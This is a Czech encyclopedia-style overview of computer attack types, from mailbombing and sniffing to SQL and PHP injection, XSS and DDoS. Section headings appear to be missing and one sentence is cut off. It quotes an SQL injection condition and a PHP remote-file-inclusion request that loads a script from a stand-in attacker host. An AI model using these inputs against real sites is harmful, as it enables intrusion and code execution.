Hackerský útok v užším slova smyslu – v současné době je toto sousloví chápáno jako „Útok na bezpečnostní systém“ a směřuje spíše k významu následujícího pojmu Crackerský útok . Bylo to způsobeno nesprávným výkladem významu samotného slova „ hacker “.
Hackerský útok v širokém slova smyslu (původní význam) je brainstorming zaměřený na hledání způsobů řešení složitých problémů. Jeden nebo více špičkových specialistů ( hackerů ) se může zúčastnit hackerského útoku. V důsledku brainstormingu mohou být vynalezeny nekonvenční metody řešení problému nebo optimalizační úpravy stávajících metod.
Crackerský útok je akce, jejímž cílem je zmocnit se kontroly (posílení práv) nad vzdáleným/místním počítačovým systémem, destabilizovat jej nebo odmítnout službu.
Je považována za nejstarší metodu útoku, i když její podstata je jednoduchá a primitivní: velké množství poštovních zpráv znemožňuje práci s poštovními schránkami a někdy i s celými poštovními servery . Pro tento účel bylo vyvinuto mnoho programů a dokonce i nezkušený uživatel by mohl provést útok zadáním pouze e-mailu oběti , textu zprávy a počtu potřebných zpráv. Mnoho takových programů umožnilo skrýt skutečnou IP adresu odesílatele pomocí anonymního poštovního serveru pro zasílání pošty . Tomuto útoku je obtížné zabránit, protože ani poštovní filtry ISP nedokážou určit skutečného odesílatele spamu . Poskytovatel může omezit počet e-mailů od jednoho odesílatele, ale adresa odesílatele a předmět jsou často generovány náhodně .
Možná jeden z nejběžnějších typů útoků na internetu. Princip tohoto útoku je založen na využití softwarových chyb, které umožňují způsobit narušení paměti a zhroucení aplikace nebo spuštění libovolného binárního kódu jménem uživatele, pod kterým zranitelný program běžel. Pokud program běží pod účtem správce systému, pak vám tento útok umožní získat plnou kontrolu nad počítačem oběti, proto se doporučuje pracovat pod účtem běžného uživatele s omezenými právy v systému a provádět pouze operace vyžadující administrátorská práva pod účtem správce systému.
Dalším typem útoku je sofistikovanější způsob získávání přístupu k utajovaným informacím – použití speciálních programů pro práci na počítači oběti a také další šíření (jedná se o viry a červy). Takové programy jsou navrženy tak, aby vyhledávaly a předávaly tajné informace jejich vlastníkovi nebo jednoduše poškodily bezpečnostní systém a výkon počítače oběti. Principy fungování těchto programů se liší.
Při takovém útoku cracker ve skutečnosti neprovádí žádné destruktivní akce, ale díky tomu může získat důvěrné informace o konstrukci a principech fungování výpočetního systému oběti. Získané informace mohou být použity ke kvalifikovanému vytvoření nadcházejícího útoku a obvykle se provádí v přípravných fázích.
V průběhu takového průzkumu může útočník provádět skenování portů , DNS dotazy , ping na otevřené porty, přítomnost a zabezpečení proxy serverů . Díky tomu můžete získat informace o DNS adresách existujících v systému, o tom, kdo je vlastní, jaké služby jsou na nich dostupné, o úrovni přístupu k těmto službám pro externí a interní uživatele.
Je to také poměrně běžný typ útoku založený na provozu síťové karty v promiskuitním režimu a také v režimu monitoru pro Wi-Fi sítě . V tomto režimu jsou všechny pakety přijaté síťovou kartou odeslány ke zpracování do speciální aplikace zvané sniffer . Díky tomu může útočník získat velké množství servisních informací: kdo, odkud a kde pakety přenášel, přes které adresy tyto pakety procházely. Největším nebezpečím takového útoku je získávání samotných informací, jako jsou přihlašovací jména a hesla zaměstnanců, pomocí kterých lze pod rouškou řadového zaměstnance firmy nelegálně vstoupit do systému.
Také běžný typ útoku v nedostatečně chráněných sítích, kdy se útočník vydává za oprávněného uživatele, ať už je v organizaci samotné nebo mimo ni. K tomu potřebuje cracker použít IP adresu, která je povolena v systému zabezpečení sítě. Takový útok je možný, pokud bezpečnostní systém umožňuje identifikaci uživatele pouze podle IP adresy a nevyžaduje další potvrzení.
Typ útoku, kdy útočník zachytí komunikační kanál mezi dvěma systémy a získá přístup ke všem přenášeným informacím. Při získání přístupu na této úrovni může útočník upravit informace tak, jak potřebuje, aby dosáhl svých cílů. Účelem takového útoku je nezákonné získání, krádež nebo falšování přenášených informací nebo získání neoprávněného přístupu k síťovým zdrojům. Takové útoky je extrémně obtížné vysledovat, protože útočník se obvykle nachází uvnitř organizace.
Rodina útoků sjednocená jedním společným principem – v důsledku útoku jsou data spouštěna jako kód.
SQL injection je útok, při kterém se mění parametry SQL dotazů do databáze. Požadavek tím získá zcela jiný význam a v případě nedostatečné filtrace vstupních dat dokáže důvěrné informace nejen zobrazit, ale i změnit/smazat. Velmi často lze tento typ útoku pozorovat na příkladu stránek, které pomocí parametrů příkazového řádku (v tomto případě URL proměnných ) sestavují SQL dotazy do databází bez řádné validace [1] .
SELECT seznam polí FROM tabulka WHERE id = 23 OR 1=1;Místo kontroly můžete nahradit příkazPHP injection je jedním ze způsobů, jak hacknout webové stránky běžící na PHP . Spočívá ve vložení speciálně vytvořeného škodlivého skriptu do kódu webové aplikace na straně serveru, což vede k provádění libovolných příkazů. Je známo, že mnoho bezplatných enginů a fór běžících na PHP, které jsou rozšířené na internetu (nejčastěji se jedná o zastaralé verze), mají nedomyšlené moduly nebo samostatné struktury se zranitelnostmi. Crackery analyzují takové zranitelnosti jako neuniknuté proměnné, které přijímají externí hodnoty. Například stará zranitelnost fóra ExBB je zneužita hackery s požadavkem: GET /modules/threadstop/threadstop.php?new_exbb[home_path]=evilhackerscorp.com/tx.txt.
Cross Site Scripting nebo XSS ( zkratka z anglického Cross Site Scripting , nezaměňovat s CSS ( Cascade Style Sheet )) je typ zranitelnosti běžně se vyskytující ve webových aplikacích, který umožňuje uživatelům se zlými úmysly vkládat kód do webových stránek prohlížených jinými uživateli. . Příklady takového kódu jsou kód HTML a skripty na straně klienta, nejčastěji JavaScript .
XPath injection je typ chyby zabezpečení, který zahrnuje vložení výrazů XPath do původního požadavku na databázi XML . Stejně jako u jiných typů injekce je zranitelnost možná kvůli nedostatečné validaci vstupních dat.
Autofill je webová injekce fungující na principu trojských koní, jejímž hlavním účelem je infiltrovat účet uživatele v platebním systému , neznatelně změnit transakční data úpravou HTML kódu a převést prostředky uživatele na účet útočníka.
Sociální inženýrství (z anglického social engineering ) - využití neschopnosti, neschopnosti nebo nedbalosti personálu k získání přístupu k informacím. Tato metoda se obvykle používá bez počítače, pomocí běžného telefonu nebo pošty. Tímto způsobem se obvykle získává široká škála informací. Útočník při takovém útokunaváže kontakt s obětí a v klamání nebo získání důvěry se snaží získat potřebné informace, které se obtížně získávají jiným způsobem, případně jsou jiné způsoby riskantnější.
DoS (z angl. Denial of Service - Denial of Service) - útok zaměřený na to, aby server neodpovídal na požadavky. Tento typ útoku nezahrnuje získání nějakých tajných informací, ale někdy je pomocí při inicializaci dalších útoků. Některé programy mohou například kvůli chybám ve svém kódu způsobit výjimky , a když jsou služby zakázány, mohou spustit kód poskytnutý útočníkem nebo zaplavit útoky, když server nemůže zpracovat velké množství příchozích paketů.
DDoS (z anglického Distributed Denial of Service - Distributed DoS) je podtyp DoS útoku, který má stejný cíl jako DoS, ale není vytvořen z jednoho počítače, ale z více počítačů v síti. Tyto typy útoků využívají buď výskyt chyb, které vedou k odmítnutí služby, nebo fungování ochrany vedoucí k zablokování provozu služby a v důsledku i k odmítnutí služby. DDoS se používá tam, kde je běžný DoS neúčinný. K tomu se sloučí několik počítačů a každý provede útok DoS na systém oběti. Dohromady se tomu říká DDoS útok. Velikost botnetu se může pohybovat od několika desítek až po několik set tisíc počítačů.
Jakýkoli útok není nic jiného než pokus využít nedokonalost bezpečnostního systému oběti buď k získání informací, nebo k poškození systému, proto je důvodem každého úspěšného útoku profesionalita crackera a hodnota informací, jakož i nekompetentnost správce bezpečnostního systému , zejména nedokonalost softwaru a nedostatečná pozornost bezpečnostním otázkám v celé společnosti.